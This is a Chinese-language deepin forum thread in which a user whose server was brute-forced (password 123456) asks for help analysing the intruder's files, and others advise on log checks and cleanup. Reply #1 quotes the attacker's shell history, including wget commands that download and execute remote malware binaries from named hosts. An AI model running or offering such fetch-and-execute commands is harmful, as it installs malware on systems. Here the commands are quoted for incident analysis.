• Home
  • Categories
  • WIKI
  • LANGUAGE: en
    • 急!服务器被hake,发现了这个东西,大佬帮分析下
    Experiences and Insight 1308 views · 20 replies ·
    Tofloor
    poster avatar
    superendermansm
    deepin
    2019-09-15 06:22
    Author
    http://www.shenmo.tech:666/v.py
    太长了,打不出来,大佬看链接吧!python脚本
    具体行为是下载了一个codemix文件然后解压(手快删掉了,里面有几个文件,比如screen 1 c等等名字)
    然后生成了了这个东西info
    http://share.shenmo.tech:666/info
    求求看看会不会留下痕迹!!!
    Reply Favorite View the author
    All Replies
    avatar
    superendermansm
    deepin
    2019-09-15 06:41
    #1
    这里是翻历史记录找到的入侵者执行的命令
    wget fanelishere.tk//arhive/info ; chmod +x * ; ./info
    passwd
    wget https://fcosmin508.000webhostapp.com/codemix.zip ; unzip codemix.zip ; cd codemix ; chmod +x *
    ls
    cat 1
    ./c 49.232
    Reply View the author
    avatar
    superendermansm
    deepin
    2019-09-15 06:45
    #2
    Reply View the author
    avatar
    superendermansm
    deepin
    2019-09-15 06:45
    #3
    Reply View the author
    avatar
    superendermansm
    deepin
    2019-09-15 06:52
    #4
    哈,看看这个
    他们的资料来源?
    http://fanelishere.tk/
    Reply View the author
    avatar
    superendermansm
    deepin
    2019-09-15 06:55
    #5
    aida 如果要删帖不要删,锁定就行,我把帖子链接放到火绒论坛看看有没有人知道
    Reply View the author
    avatar
    Feng Yu
    deepin
    2019-09-15 06:59
    #6
    本帖最后由 abcfy2 于 2019-9-14 23:01 编辑

    你应该查一下你的服务器都部署了哪些应用,另外操作系统本身是否有漏洞。基本这些用脚本跑的都是被脚本小子攻击的,很容易堵漏。

    以前我的服务器被中过肉鸡,后来查到是elasticsearch的一个漏洞,用iptables封锁ES外网访问,然后清理掉肉鸡文件,基本上就再也没有被hack过,光删文件不顶用。

    还有一次被中过挖矿脚本,差不多也是开发这边不看漏洞提示,用了一个旧版本的类库导致的,升级漏洞补丁也解决了。

    所以你应该查一下你都部署了什么玩意,哪些服务是对外提供访问的,按照这个思路去查基本都能找到漏洞来源。你也可以看看这些文件和进程的属主,基本也能确认是哪个服务带来的漏洞。如果是root,恭喜你,服务器炸了,你的root权限已经旁落,几乎再怎么清理都不可能彻底清理掉了,建议重装。
    我的服务都不是用root权限跑的,基本上没有遇到过清理不掉的情况,一看文件和进程的属主就知道是哪个服务带来了漏洞,然后升级操作系统,升级软件包,再清理木马文件就完事了。只要root大权不旁落,对系统的破坏是有限的,很容易清理干净
    Reply View the author
    avatar
    superendermansm
    deepin
    2019-09-15 07:09
    #7
    abcfy2 发表于 2019-9-14 22:59
    你应该查一下你的服务器都部署了哪些应用,另外操作系统本身是否有漏洞。基本这些用脚本跑的都是被脚本小子 ...

    我看了,没有漏洞
    他暴力破解的密码,我看了我发的第二个网站,里面有暴力破解密码表,我的密码很不幸就在此列
    默认用户已经暴露了,看了一下root并没有暴露,因为没有给root设置密码,脚本没发现sudo是空的,我查了历史记录,从失去控制开始的,看样子他根本没看sudo能不能用
    Reply View the author
    avatar
    superendermansm
    deepin
    2019-09-15 07:13
    #8
    abcfy2 发表于 2019-9-14 22:59
    你应该查一下你的服务器都部署了哪些应用,另外操作系统本身是否有漏洞。基本这些用脚本跑的都是被脚本小子 ...

    看了一下,远程重启之后没有陌生进程
    估计已经干净了,现在唯一留下的病毒文件就是放出来链接这两个
    看了那个网站,好像是自动找肉鸡进行ddos,还好我这台只有1M带宽,估计他看了配置和带宽就放弃了吧
    那个info的作用好像是获取系统信息和部署病毒,那个人看了几个文件之后就跑那个c程序,然后他就走了
    Reply View the author
    avatar
    Feng Yu
    deepin
    2019-09-15 07:17
    #9
    本帖最后由 abcfy2 于 2019-9-14 23:18 编辑
    https://bbs.deepin.org/post/182683
    看了一下,远程重启之后没有陌生进程
    估计已经干净了,现在唯一留下的病毒文件就是放出来链接这两个
    看了 ...

    如果你猜测是暴力破解,可以检查下 last 和 lastb 的输出,除非你的密码实在太弱,否则暴力破解几乎对Linux影响微乎其微。Linux会默认对密码错误延迟3秒还是1秒之后才返回密码错误,几乎不太可能被暴力破解。你可以检查下你的 last和 lastb,以及auth.log看看有没有暴力破解。
    Linux远程连接并没有列出系统可用用户的功能,所以普通用户被暴力破解几乎是不可能的事情,攻击者几乎无法猜测出你的合法用户。如果你发现不明文件是普通用户创建的,几乎都是你用那个低权限用户运行了某个具有漏洞的服务,被攻击了,几乎不太可能通过弱密码登录过来
    Reply View the author
    avatar
    superendermansm
    deepin
    2019-09-15 07:22
    #10
    abcfy2 发表于 2019-9-14 23:17
    如果你猜测是暴力破解,可以检查下 last 和 lastb 的输出,除非你的密码实在太弱,否则暴力破解几乎对Lin ...

    如何做?
    我是个小白。。。
    我知道是暴shj力poj是因为message
    去tm的论坛敏感词
    Reply View the author
    avatar
    superendermansm
    deepin
    2019-09-15 07:24
    #11
    183.134.6.163  哦豁,这个super b的ip漏出来了
    Reply View the author
    avatar
    superendermansm
    deepin
    2019-09-15 07:25
    #12

    浙江的
    Reply View the author
    avatar
    superendermansm
    deepin
    2019-09-15 07:27
    #13
    abcfy2 发表于 2019-9-14 23:17
    如果你猜测是暴力破解,可以检查下 last 和 lastb 的输出,除非你的密码实在太弱,否则暴力破解几乎对Linu ...

    http://www.fanelishere.tk//passfiles/
    这里就是密码库
    好家伙,没有https
    Reply View the author
    avatar
    superendermansm
    deepin
    2019-09-15 07:29
    #14
    abcfy2 发表于 2019-9-14 23:17
    如果你猜测是暴力破解,可以检查下 last 和 lastb 的输出,除非你的密码实在太弱,否则暴力破解几乎对Linu ...

    我还以为没人会想要我的小服务器,密码用的是123456
    估计这家伙批量ping的ip才找到我的吧
    Reply View the author
    avatar
    走钢丝
    deepin
    2019-09-15 07:37
    #15
    https://bbs.deepin.org/post/182683
    我还以为没人会想要我的小服务器,密码用的是123456
    估计这家伙批量ping的ip才找到我的吧 ...

    123456...你逗我的吧。。
    Reply View the author
    avatar
    neko
    deepin
    Ecological co-builder
    Q&A Team
    2019-09-15 17:00
    #16
    123456...可以
    Reply View the author
    avatar
    justforlxz
    deepin
    2019-09-15 17:10
    #17
    我知道你服务器密码了,赶紧给我打50个比特币,不然我就上去给你放色图了
    Reply View the author
    avatar
    superendermansm
    deepin
    2019-09-15 17:15
    #18
    kirigaya 发表于 2019-9-15 09:10
    我知道你服务器密码了,赶紧给我打50个比特币,不然我就上去给你放色图了 ...

    放心
    换成秘钥登录了
    Reply View the author
    avatar
    superendermansm
    deepin
    2019-09-15 17:15
    #19
    lidanger 发表于 2019-9-14 23:37
    123456...你逗我的吧。。

    我还真就傻了。。。
    Reply View the author
    avatar
    cheesezhang
    deepin
    2019-09-16 19:31
    #20
    https://bbs.deepin.org/post/182683
    我知道你服务器密码了,赶紧给我打50个比特币,不然我就上去给你放色图了 ...

    我很赞同
    Reply View the author